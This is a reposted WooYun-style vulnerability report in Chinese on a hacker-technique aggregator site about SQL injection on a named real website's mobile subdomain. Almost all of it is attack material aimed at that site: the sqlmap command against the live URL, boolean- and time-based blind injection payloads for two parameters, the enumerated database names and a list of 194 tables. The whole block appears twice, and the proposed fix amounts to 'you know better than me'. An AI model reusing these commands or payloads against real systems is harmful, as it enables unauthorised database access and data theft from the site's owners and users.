记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

小熊在线某分站注入漏洞

2015-06-14 08:10

code 区域
C:\sqlmap.py -u "wap.beargoo.com.cn/detail.php?menid=1626&smallid=774" --dbs

_

___ ___| |_____ ___ ___ {1.0-dev-nongit-20150309}

|_ -| . | | | .'| . |

|___|_ |_|_|_|_|__,| _|

|_| |_| http://sqlmap.org



[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program



[*] starting at 10:04:20



[10:04:20] [INFO] resuming back-end DBMS 'mysql'

[10:04:20] [INFO] testing connection to the target URL

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: menid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: menid=1626 AND 8835=8835&smallid=774



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: menid=1626 AND SLEEP(5)&smallid=774



Place: GET

Parameter: smallid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: menid=1626&smallid=774 AND 8126=8126



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: menid=1626&smallid=774 AND SLEEP(5)

---

there were multiple injection points, please select the one to use for following

injections:

[0] place: GET, parameter: smallid, type: Unescaped numeric (default)

[1] place: GET, parameter: menid, type: Unescaped numeric

[q] Quit

>

[10:04:38] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.0.63, PHP 5.2.13

back-end DBMS: MySQL 5.0.11

[10:04:38] [INFO] fetching database names

[10:04:38] [INFO] fetching number of databases

[10:04:38] [INFO] resumed: 3

[10:04:38] [INFO] resumed: information_schema

[10:04:38] [INFO] resumed: flawless

[10:04:38] [INFO] resumed: test

available databases [3]:

[*] flawless

[*] information_schema

[*] test



[10:04:38] [INFO] fetched data logged to text files under 'C:\Users\Administrato

r\.sqlmap\output\wap.beargoo.com.cn'



[*] shutting down at 10:04:38



数据库表:

code 区域
Database: flawless

[194 tables]

+-----------------+

| adm_amlogs |

| adm_dblogs |

| adm_documt |

| adm_logics |

| adm_mbmenu |

| adm_member |

| adm_mgroup |

| adm_mpower |

| adm_seting |

| bea_bugrep |

| bea_buguser |

| bear_stat |

| bey_admins |

| bey_brands |

| bey_categ2 |

| bey_categ3 |

| bey_imppam |

| bey_inspro |

| bey_jslist |

| bey_knames |

| bey_lackpro |

| bey_mandea |

| bey_manpro |

| bey_manuse |

| bey_news |

| bey_newsclass |

| bey_pripro |

| bey_produc |

| bgo_voupro |

| bij_categ2 |

| bij_produt |

| bra_brands |

| byn_admins |

| byn_goods |

| byn_images |

| byn_notice |

| cah_apidata |

| cah_brands |

| cah_ca2bra |

| cah_ca2pro |

| cah_ca2pro_ |

| cah_hotbra |

| cah_itemid |

| cah_menbra |

| cah_menpam |

| cah_mentlk |

| cah_pamful |

| cah_pamful2 |

| cah_pamsel |

| cah_pricty |

| cah_pridea |

| cah_priold |

| cah_prisal |

| cah_pritop |

| cah_rempid |

| cah_remtid |

| cah_sqlcah |

| cli_client |

| cmp_dealer |

| cmp_news |

| cms_art2pr |

| cms_articl |

| cms_mispro |

| com_commet |

| com_editor |

| crop_img |

| cut_cutwrd |

| cut_derlnk |

| cut_derwrd |

| cut_wordlk |

| cut_wrdpro |

| der_action |

| der_addnew |

| der_admins |

| der_advert |

| der_bkmenu |

| der_brader |

| der_ca2bra |

| der_ca2pro |

| der_ca2shp |

| der_caches |

| der_cmpxy |

| der_compay |

| der_contro |

| der_dealer |

| der_defcat |

| der_documt |

| der_frlink |

| der_groups |

| der_helpfu |

| der_idxadv |

| der_idxtop |

| der_idxzxu |

| der_images |

| der_impression |

| der_iplibs |

| der_kefues |

| der_licenc |

| der_logics |

| der_member |

| der_module |

| der_mybill |

| der_mybran |

| der_mycont |

| der_myitem |

| der_mypage |

| der_myshop |

| der_orders |

| der_orlist |

| der_orshlk |

| der_picslk |

| der_praise |

| der_pricty |

| der_promot |

| der_quecah |

| der_queues |

| der_quote2 |

| der_quotes |

| der_qutcah |

| der_qutold |

| der_receip |

| der_shlogi |

| der_shpcah |

| der_shplog |

| der_shpsrt |

| der_stabra |

| der_staopn |

| der_stapro |

| der_stashp |

| der_stavie |

| der_subill |

| der_suitem |

| der_suites |

| der_sysmsg |

| der_system |

| der_templa |

| der_thread |

| der_websit |

| diy_pccate |

| diy_pcfrom |

| diy_pclist |

| diy_pcpart |

| diy_pcuser |

| diz_frmfid |

| idx_ca2pro |

| man_categ1 |

| man_categ2 |

| man_catelk |

| man_tblist |

| man_tbpath |

| man_tbsrt1 |

| man_tbsrt2 |

| pam_pamdef |

| pam_pamsrt |

| pam_pamval |

| pam_property |

| paw_bradlk |

| paw_cities |

| paw_dealer |

| paw_distri |

| paw_itemid |

| paw_market |

| paw_mentlk_stat |

| paw_prices |

| paw_prices_old |

| paw_prider |

| paw_provin |

| paw_region |

| paw_remusr |

| paw_websit |

| pic_categy |

| pic_images |

| pic_places |

| pic_produt |

| pop_poppro |

| sta_brands |

| sta_common |

| sta_dealer |

| sta_interf |

| sta_knames |

| sta_menvie |

| sta_number |

| sta_pvstat |

| sta_search |

| sta_sqlcah |

| tag_admin |

| userinfo |

| vdo_catpro |

| vdo_provideo |

| vie_prices |

| vot_bervot |

| vot_votsel |

| vot_vottle |

| wap_mesend |

+-----------------+

漏洞证明:

code 区域
C:\qlmap.py -u "wap.beargoo.com.cn/detail.php?menid=1626&smallid=774" --dbs

_

___ ___| |_____ ___ ___ {1.0-dev-nongit-20150309}

|_ -| . | | | .'| . |

|___|_ |_|_|_|_|__,| _|

|_| |_| http://sqlmap.org



[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program



[*] starting at 10:04:20



[10:04:20] [INFO] resuming back-end DBMS 'mysql'

[10:04:20] [INFO] testing connection to the target URL

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: menid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: menid=1626 AND 8835=8835&smallid=774



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: menid=1626 AND SLEEP(5)&smallid=774



Place: GET

Parameter: smallid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: menid=1626&smallid=774 AND 8126=8126



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: menid=1626&smallid=774 AND SLEEP(5)

---

there were multiple injection points, please select the one to use for following

injections:

[0] place: GET, parameter: smallid, type: Unescaped numeric (default)

[1] place: GET, parameter: menid, type: Unescaped numeric

[q] Quit

>

[10:04:38] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.0.63, PHP 5.2.13

back-end DBMS: MySQL 5.0.11

[10:04:38] [INFO] fetching database names

[10:04:38] [INFO] fetching number of databases

[10:04:38] [INFO] resumed: 3

[10:04:38] [INFO] resumed: information_schema

[10:04:38] [INFO] resumed: flawless

[10:04:38] [INFO] resumed: test

available databases [3]:

[*] flawless

[*] information_schema

[*] test



[10:04:38] [INFO] fetched data logged to text files under 'C:\Users\Administrato

r\.sqlmap\output\wap.beargoo.com.cn'



[*] shutting down at 10:04:38



数据库表:

code 区域
Database: flawless

[194 tables]

+-----------------+

| adm_amlogs |

| adm_dblogs |

| adm_documt |

| adm_logics |

| adm_mbmenu |

| adm_member |

| adm_mgroup |

| adm_mpower |

| adm_seting |

| bea_bugrep |

| bea_buguser |

| bear_stat |

| bey_admins |

| bey_brands |

| bey_categ2 |

| bey_categ3 |

| bey_imppam |

| bey_inspro |

| bey_jslist |

| bey_knames |

| bey_lackpro |

| bey_mandea |

| bey_manpro |

| bey_manuse |

| bey_news |

| bey_newsclass |

| bey_pripro |

| bey_produc |

| bgo_voupro |

| bij_categ2 |

| bij_produt |

| bra_brands |

| byn_admins |

| byn_goods |

| byn_images |

| byn_notice |

| cah_apidata |

| cah_brands |

| cah_ca2bra |

| cah_ca2pro |

| cah_ca2pro_ |

| cah_hotbra |

| cah_itemid |

| cah_menbra |

| cah_menpam |

| cah_mentlk |

| cah_pamful |

| cah_pamful2 |

| cah_pamsel |

| cah_pricty |

| cah_pridea |

| cah_priold |

| cah_prisal |

| cah_pritop |

| cah_rempid |

| cah_remtid |

| cah_sqlcah |

| cli_client |

| cmp_dealer |

| cmp_news |

| cms_art2pr |

| cms_articl |

| cms_mispro |

| com_commet |

| com_editor |

| crop_img |

| cut_cutwrd |

| cut_derlnk |

| cut_derwrd |

| cut_wordlk |

| cut_wrdpro |

| der_action |

| der_addnew |

| der_admins |

| der_advert |

| der_bkmenu |

| der_brader |

| der_ca2bra |

| der_ca2pro |

| der_ca2shp |

| der_caches |

| der_cmpxy |

| der_compay |

| der_contro |

| der_dealer |

| der_defcat |

| der_documt |

| der_frlink |

| der_groups |

| der_helpfu |

| der_idxadv |

| der_idxtop |

| der_idxzxu |

| der_images |

| der_impression |

| der_iplibs |

| der_kefues |

| der_licenc |

| der_logics |

| der_member |

| der_module |

| der_mybill |

| der_mybran |

| der_mycont |

| der_myitem |

| der_mypage |

| der_myshop |

| der_orders |

| der_orlist |

| der_orshlk |

| der_picslk |

| der_praise |

| der_pricty |

| der_promot |

| der_quecah |

| der_queues |

| der_quote2 |

| der_quotes |

| der_qutcah |

| der_qutold |

| der_receip |

| der_shlogi |

| der_shpcah |

| der_shplog |

| der_shpsrt |

| der_stabra |

| der_staopn |

| der_stapro |

| der_stashp |

| der_stavie |

| der_subill |

| der_suitem |

| der_suites |

| der_sysmsg |

| der_system |

| der_templa |

| der_thread |

| der_websit |

| diy_pccate |

| diy_pcfrom |

| diy_pclist |

| diy_pcpart |

| diy_pcuser |

| diz_frmfid |

| idx_ca2pro |

| man_categ1 |

| man_categ2 |

| man_catelk |

| man_tblist |

| man_tbpath |

| man_tbsrt1 |

| man_tbsrt2 |

| pam_pamdef |

| pam_pamsrt |

| pam_pamval |

| pam_property |

| paw_bradlk |

| paw_cities |

| paw_dealer |

| paw_distri |

| paw_itemid |

| paw_market |

| paw_mentlk_stat |

| paw_prices |

| paw_prices_old |

| paw_prider |

| paw_provin |

| paw_region |

| paw_remusr |

| paw_websit |

| pic_categy |

| pic_images |

| pic_places |

| pic_produt |

| pop_poppro |

| sta_brands |

| sta_common |

| sta_dealer |

| sta_interf |

| sta_knames |

| sta_menvie |

| sta_number |

| sta_pvstat |

| sta_search |

| sta_sqlcah |

| tag_admin |

| userinfo |

| vdo_catpro |

| vdo_provideo |

| vie_prices |

| vot_bervot |

| vot_votsel |

| vot_vottle |

| wap_mesend |

+-----------------+

修复方案:

你们比我懂

知识来源: www.wooyun.org/bugs/wooyun-2015-0110420

阅读:157946 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“小熊在线某分站注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云